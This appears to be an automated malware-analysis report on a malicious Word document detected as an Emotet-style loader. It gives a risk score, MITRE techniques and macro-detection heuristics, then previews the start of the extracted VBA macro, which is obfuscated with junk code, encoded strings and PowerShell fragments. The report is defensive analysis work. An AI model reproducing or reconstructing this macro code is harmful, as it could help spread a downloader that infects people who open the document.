MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro, which is a common technique for initial execution. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' and the presence of a VBA macro named 'macros.bas' strongly indicate its malicious nature. The VBA script likely attempts to download and execute a second-stage payload, a common behavior for this type of malware.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42818 bytes |
SHA-256: 345fab52bda2cd3ec2bd2b04b1006c19a6755afaddc7808308d10e1d27c3778a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 26 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "XYwXHhSJzT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "fQtJnwQXWlXXb"
Function vXtraVCRzJ()
On Error Resume Next
Select Case JsJfP
Case 22649
zXAcD = Hex(25850 - CSng(33135) - 74257 + ChrW(TuDFzF))
FwjPP = mKwkzj
End Select
iVkKAlZChw = oUjzR("0w6BlAGEAMAA1ADgAZQAyADMAOABjADYANAAyADQAMgBhADMANAA4AGYANQA5A%3EuO8", 4, 59)
Select Case LwWufH
Case 4502
AGFQDr = Hex(47350 - CSng(24321) - 87627 + ChrW(FDiEhj))
rRlqdT = imdUY
End Select
Select Case bmzJN
Case 87880
wPRfv = Hex(83481 - CSng(863) - 9802 + ChrW(fOOaS))
OjjCNi = vtYKP
End Select
ZdwNzsTE = oUjzR("vYuInNQBiADAANAAzADUAZgA2ADUAYwBmADkAYwA5AGYAZgBhADMAYQBhADYAMgAwADAANAA3AGMANQA1AGIAMgA1AGMANQA2ADAANwA0ADMAYQA3ADS,", 6, 110)
Select Case wLcnsi
Case 67694
WjziJE = Hex(89887 - CSng(96764) - 29705 + ChrW(jopYQ))
LjTtT = HlcYJ
End Select
Select Case kWGzEd
Case 7033
zKOuo = Hex(67024 - CSng(6066) - 23091 + ChrW(mrUfI))
GVDjX = qtnoPZ
End Select
mdtzv = oUjzR("KAArTzBh", 2, 2)
Select Case nfpuR
Case 13180
YPHBj = Hex(69453 - CSng(17574) - 61944 + ChrW(nrEcQ))
cBujZ = QbGZJ
End Select
Select Case JPdooI
Case 85821
MfMrLL = Hex(4076 - CSng(95932) - 30249 + ChrW(tWpKG))
BYNzP = wRBlCc
End Select
bRhjmZKwVC = oUjzR("rja6BAZAAwAGUANgBkADUANwA4AGYAZQBkAGEANQBhAGMAYQBmAGYAOAA2ADkANwAwAGEAYwBiADcANQAxAGMAYwBkAGQAOQBjADAAYgA5AGIAMwBjAVN", 6, 110)
Select Case rTnZL
Case 32214
qUOSqp = Hex(96229 - CSng(61078) - 30651 + ChrW(owIWnQ))
sQbjvq = JZoXjF
End Select
Select Case qwFAtB
Case 7467
DMzHW = Hex(93053 - CSng(46388) - 53866 + ChrW(zkDmQs))
bBBzq = iWUjX
End Select
wVsrhIzwi = oUjzR("n2W%vlADcAZQA4ADIAZgBiAGUAMwBhADQAMgA0AGUAMQA5ADgANwA3AGEAMQBiADYAYwBhADEANgAwAGIAOAAxADUAMQBjAGEAMwA5AGIAZgA5ADYAMQAzADkAOABiADMANQBhADAAYQAwAGGE", 6, 139)
Select Case dEGTw
Case 16430
fcFuvD = Hex(20289 - CSng(99912) - 48534 + ChrW(uJZEoY))
AEVwda = pYEwvr
End Select
Select Case ZmwvjC
Case 12951
uKBoEj = Hex(57391 - CSng(78921) - 88311 + ChrW(PzjKKW))
tBbbVQ = nAYZu
End Select
WAXLiwKb = oUjzR("iI%q,170,243,41,11,131,125,249,13,228,253,194,164,105,216,102,86,140,109,33,107,74,45,150,119,163,175,195,236,220,20tH0", 5, 112)
Select Case ijwPo
Case 76148
NXRHB = Hex(23944 - CSng(86063) - 46139 + ChrW(tObaHn))
fKZtf = EHEur
End Select
Select Case szOZS
Case 10778
zXGUV = Hex(22620 - CSng(91070) - 61139 + ChrW(iupLm))
ERPouR = qZJRhO
End Select
tdjiZwwb = oUjzR("cNwA1ADgAZQBlAGUAYQA3ADYANABlAGIAYQBlADMANQA1AGQANwBlADkANQBlADAAYgA4ADQAYwBiADkAZgA1AGEAZABjAGQAYgA1ADAAMAA5ADEAZgAxAGIAYgAyADcAMABiAGIANgA2ADEAAan@wA", 2, 144)
Select Case ijifuJ
Case 10182
uhPWn = Hex(31123 - CSng(94121) - 22908 + ChrW(ViQtwK))
LDUjjK = ijCpw
End Select
Select Case ilNrW
Case 17189
TWYhs = Hex(61634 - CSng(22880) - 90381 + ChrW(mYPEjU))
AJPZdi = dQJGGN
End Select
dmdwaUTio = oUjzR("b3lcE)[1,3]+'X'-jOiN'')jIkQ", 4, 20)
Select Case vifbZQ
Case 44833
rLqKvY = Hex(45811 - CSng(66720) - 53578 + ChrW(OtMhGj))
kduRjZ = hoqqj
End Select
Select Case hurAXu
Case 71387
injGjX = Hex(28100 - CSng(10540) - 10005 + ChrW(MQMth))
ElDUQV = BSQjT
End Select
RfiFwtqhRd = oUjzR("94,248))))|. ( ([STRINg]$VErBOsEPREfErEn684vMid", 2, 39)
Select Case crswb
Case 74328
PElab = Hex(52448 - CSng(65236) - 11133 + ChrW(ScnNu))
mrQaI
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.